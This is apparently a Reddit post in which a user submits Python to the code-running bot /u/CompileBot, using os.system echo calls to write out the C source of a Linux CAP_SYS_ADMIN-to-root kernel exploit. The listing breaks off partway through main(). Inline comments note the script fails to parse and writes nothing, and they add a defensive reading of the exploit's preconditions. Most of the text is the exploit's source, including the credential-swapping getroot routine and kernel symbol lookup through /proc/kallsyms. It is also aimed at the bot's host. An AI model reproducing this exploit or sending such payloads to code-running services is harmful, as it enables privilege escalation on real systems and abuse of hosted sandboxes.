Redditors trying to kill /u/compilebot

+/u/CompileBot python

import os
# Submission aimed at a code-running bot: it tries to write the C source of a
# local privilege-escalation exploit into x.c, one shell `echo` per C line.
#
# As shown on this page the script cannot run. Several lines (the SYM_NAME
# defines and the sprintf/popen/fscanf/printf lines) contain unescaped double
# quotes that end the Python string literal early, so the interpreter rejects
# the whole file with a SyntaxError before any os.system call executes.
# On the lines that do parse, `> x.c` sits inside the single-quoted echo
# argument, so the shell prints it as literal text and x.c (created empty by
# `touch`) receives nothing.
#
# Defensive reading: the usage text being echoed says the compiled binary needs
# cap_sys_admin granted through `sudo setcap`, a kernel >= 2.6.34 and Phonet
# socket support. A sandbox that runs submissions unprivileged and grants no
# file capabilities does not meet those stated preconditions. An interpreter
# process spawning a shell to write a .c file is still a signal worth logging.
os.system("touch x.c")    
# Header comment of the C file: author, release date, usage and tested systems.
os.system("echo '/* > x.c '")
os.system("echo ' * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) > x.c '")
os.system("echo ' * by Joe Sylve > x.c '")
os.system("echo ' * @jtsylve on twitter > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Released: Jan 7, 2011 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Based on the bug found by Dan Rosenberg (@djrbliss) > x.c '")
os.system("echo ' * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ > x.c '")
os.system("echo ' *  > x.c '")
os.system("echo ' * Usage: > x.c '")
os.system("echo ' * gcc -w caps-to-root2.c -o caps-to-root2 > x.c '")
os.system("echo ' * sudo setcap cap_sys_admin+ep caps-to-root2 > x.c '")
os.system("echo ' * ./caps-to-root2 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Kernel Version >= 2.6.34 (untested on earlier versions) > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * This exploit takes advantage of the same underflow as the original, > x.c '")
os.system("echo ' * but takes a different approach.  Instead of underflowing into userspace > x.c '")
os.system("echo ' * (which doesn't work on 64-bit systems and is a lot of work), I underflow  > x.c '")
os.system("echo ' * to some static values inside of the kernel which are referenced as pointers > x.c '")
os.system("echo ' * to userspace.  This method is pretty simple and seems to be reliable. > x.c '")
os.system("echo ' */ > x.c '")
os.system("echo '  > x.c '")
# C includes.
os.system("echo '#include <stdio.h> > x.c '")
os.system("echo '#include <sys/socket.h> > x.c '")
os.system("echo '#include <errno.h> > x.c '")
os.system("echo '#include <string.h> > x.c '")
os.system("echo '#include <sys/mman.h> > x.c '")
os.system("echo '#include <unistd.h> > x.c '")
os.system("echo '  > x.c '")
# Skeleton struct declarations from the C source.
os.system("echo '// Skeleton Structures of the Kernel Structures we're going to spoof > x.c '")
os.system("echo 'struct proto_ops_skel { > x.c '")
os.system("echo '    int family; > x.c '")
os.system("echo '    void  *buffer1[8]; > x.c '")
os.system("echo '    int (*ioctl)(void *, int, long); > x.c '")
os.system("echo '    void  *buffer2[12]; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'struct phonet_protocol_skel { > x.c '")
os.system("echo '    void    *ops; > x.c '")
os.system("echo '    void    *prot; > x.c '")
os.system("echo '    int sock_type;   > x.c '")
os.system("echo '}; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '  > x.c '")
# Architecture-specific defines and typedefs.
os.system("echo '#ifdef __x86_64__  > x.c '")
os.system("echo '  > x.c '")
# NOTE: the inner double quotes on the next line close the Python string
# early; this is the first line at which the file stops being valid Python.
os.system("echo '#define SYM_NAME "local_port_range" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x0000007f00000040 > x.c '")
os.system("echo '#define SYM_OFFSET 0x0 > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'typedef int (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#else //32-bit > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#define SYM_NAME "pn_proto" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x4e4f4850 > x.c '")
os.system("echo '#define SYM_OFFSET 0x90 > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#endif > x.c '")
os.system("echo '  > x.c '")
os.system("echo '  > x.c '")
os.system("echo '_commit_creds commit_creds; > x.c '")
os.system("echo '_prepare_kernel_cred prepare_kernel_cred; > x.c '")
os.system("echo '  > x.c '")
# C function getroot().
os.system("echo 'int getroot(void * v, int i, long l) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo '    commit_creds(prepare_kernel_cred(0)); > x.c '")
os.system("echo '    return 0;       > x.c '")
os.system("echo '} > x.c '")
os.system("echo '  > x.c '")
# C function get_kernel_sym(): greps /proc/kallsyms for a symbol name.
os.system("echo '/* thanks spender... */ > x.c '")
os.system("echo 'unsigned long get_kernel_sym(char *name) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo '    FILE *f; > x.c '")
os.system("echo '    unsigned long addr; > x.c '")
os.system("echo '    char dummy; > x.c '")
os.system("echo '    char sname[512]; > x.c '")
os.system("echo '    int ret; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    char command[512]; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    sprintf(command, "grep \"%s\" /proc/kallsyms", name); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    f = popen(command, "r"); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    while(ret != EOF) { > x.c '")
os.system("echo '        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '        if (ret == 0) { > x.c '")
os.system("echo '            fscanf(f, "%s\n", sname); > x.c '")
os.system("echo '            continue; > x.c '")
os.system("echo '        } > x.c '")
os.system("echo '  > x.c '")
os.system("echo '        if (!strcmp(name, sname)) { > x.c '")
os.system("echo '  > x.c '")
os.system("echo '            fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); > x.c '")
os.system("echo '            pclose(f); > x.c '")
os.system("echo '            return addr; > x.c '")
os.system("echo '        } > x.c '")
os.system("echo '    } > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    pclose(f); > x.c '")
os.system("echo '    return 0; > x.c '")
os.system("echo '} > x.c '")
os.system("echo '  > x.c '")
# Start of the C main(); the listing on this page stops partway through it.
os.system("echo 'int main(int argc, char * argv[]) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    int sock, proto; > x.c '")
os.system("echo '    unsigned long proto_tab, low_kern_sym, pn_proto; > x.c '")
os.system("echo '    void * map; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    /* Create a socket to load the module for symbol support */ > x.c '")
os.system("echo '    printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); > x.c '")
os.system("echo '    sock = socket(PF_PHONET, SOCK_DGRAM, 0); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    if(sock < 0) { > x.c '")
os.system("echo '        if(errno == EPERM) > x.c '")
os.system("echo '            printf("[*] You don't have CAP_SYS_ADMIN.\n"); > x.c '")